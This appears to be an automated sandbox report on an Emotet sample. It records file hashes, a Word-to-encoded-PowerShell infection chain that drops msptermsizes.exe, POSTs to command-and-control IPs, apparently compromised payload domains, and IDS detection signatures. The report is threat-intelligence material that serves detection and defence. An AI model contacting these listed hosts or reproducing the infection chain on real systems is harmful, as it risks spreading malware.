File name: | sample.zip |
Full analysis: | https://app.any.run/tasks/eb5643b7-4ed1-436e-9677-e0780c2e0866 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 16:30:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | D92688E530DAC1459040EBA2363BA498 |
SHA1: | 8D4C4FE377329AFA8433B5EE13ACA8AE2912204F |
SHA256: | D3CB19509DBA777DB7FD6FC00478774DBBE14F82AAA646B38B5801649BD7F862 |
SSDEEP: | 3072:BET9o3homwl6Y4u8+laAxfe/Ekcjly1M3oOxpsQbnbf:0K3hcZ4u8+laAxlkKU1M3oObsE7 |
.zip: | ZIP compressed archive (100) |
ZipFileName: | c196949b64c47c46681ca3b1eaf57e49b76f0f867f49b2b2b89544c6bbb17c5f.bin |
ZipUncompressedSize: | 253952 |
ZipCompressedSize: | 137551 |
ZipCRC: | 0xda32d12f |
ZipModifyDate: | 2019:10:09 16:30:10 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0001 |
ZipRequiredVersion: | 788 |
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
2292 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\sample.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0
592 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\kmdkkmkgdsd.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
3780 | powershell -enco … | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2648 | "C:\Users\admin\689.exe" | C:\Users\admin\689.exe | — | powershell.exe | User: admin; Company: Monkey Head Software; Integrity Level: MEDIUM; Description: Monkey Head Media Stream; Exit code: 0; Version: 1, 0, 0, 1
3312 | --c31de7b5 | C:\Users\admin\689.exe | — | 689.exe | User: admin; Company: Monkey Head Software; Integrity Level: MEDIUM; Description: Monkey Head Media Stream; Exit code: 0; Version: 1, 0, 0, 1
3032 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 689.exe | User: admin; Company: Monkey Head Software; Integrity Level: MEDIUM; Description: Monkey Head Media Stream; Exit code: 0; Version: 1, 0, 0, 1
2440 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | msptermsizes.exe | User: admin; Company: Monkey Head Software; Integrity Level: MEDIUM; Description: Monkey Head Media Stream; Version: 1, 0, 0, 1
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2292 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2292.16267\c196949b64c47c46681ca3b1eaf57e49b76f0f867f49b2b2b89544c6bbb17c5f.bin | — | — | —
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD349.tmp.cvr | — | — | —
592 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\kmdkkmkgdsd.doc.LNK | — | — | —
3780 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M371KKIKOOROB32ASLG2.temp | — | — | —
592 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 81042DFE04BBC1E7C6512BE64B3CB7AC | 653134911244FC5BD0F87FC964D182B164B63606C219AEB2785A4574EC4DC8CC
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\66D063A7.wmf | wmf | 59432DA3A425B1CFC8E5B0E2DE2704B6 | 1C11365663ED35BF939BFD19E2A8C826FB7FEDDF8F0B80F12D25C2AD64C72EDC
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9103334D.wmf | wmf | 37AF23B1C17B442244502E0D958982DF | 49FB0724215F269191EACF913926DD66B4F489FDF30843A448363A8CF5B1517F
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB98997C.wmf | wmf | 280247306980DCCBEE05BDA303A396E8 | 913002A00A29CCB098E1594DCB3016589E5931E20ED34FE5700B710820D82A70
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A61F48EA.wmf | wmf | 06D4B5E0350C6D98715B48FA7F081EA1 | CA7D55836EFBC11F481F4E2E29884414EEE7D085446D9F90841A0CD0C7078AEC
592 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E224A088.wmf | wmf | 6D00203B48FA5E9BD4C0BCDD0A41DED1 | 7353A7CCD199771D6DE065874191DA96A3CAFE2455C0C2A0B837ABFD7705DF50
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2440 | msptermsizes.exe | POST | — | 23.239.29.211:443 | http://23.239.29.211:443/glitch/ | US | — | — | malicious |
2440 | msptermsizes.exe | POST | — | 198.199.114.69:8080 | http://198.199.114.69:8080/arizona/enable/ | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3780 | powershell.exe | 160.153.129.231:80 | www.medyumsuleymansikayet.com | GoDaddy.com, LLC | US | malicious |
3780 | powershell.exe | 23.229.205.99:443 | 1greatrealestatesales.com | GoDaddy.com, LLC | US | unknown |
2440 | msptermsizes.exe | 198.199.114.69:8080 | — | Digital Ocean, Inc. | US | malicious |
2440 | msptermsizes.exe | 23.239.29.211:443 | — | Linode, LLC | US | malicious |
Domain | IP | Reputation
---|---|---
1greatrealestatesales.com | | unknown
www.medyumsuleymansikayet.com | | malicious
PID | Process | Class | Message |
---|---|---|---|
3780 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3780 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3780 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2440 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2440 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2440 | msptermsizes.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |